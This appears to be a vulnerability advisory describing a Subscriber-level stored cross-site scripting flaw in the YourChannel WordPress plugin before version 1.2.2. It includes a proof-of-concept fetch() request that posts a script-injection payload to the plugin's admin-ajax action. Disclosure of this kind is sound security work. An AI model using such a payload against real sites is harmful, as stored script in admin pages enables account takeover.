WordPress Plugin Vulnerabilities

YourChannel < 1.2.2 - Subscriber+ Stored XSS

Description

The plugin does not sanitize and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.

Proof of Concept

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=yrc_save_lang&yrc_lang[Videos]="><script>alert(1)</script>'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The script will be exploited on the YourChannel admin page.

Affects Plugins

Fixed in 1.2.2

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-01-13 (about 1 years ago)
Added
2023-01-13 (about 1 years ago)
Last Updated
2023-01-13 (about 1 years ago)

Other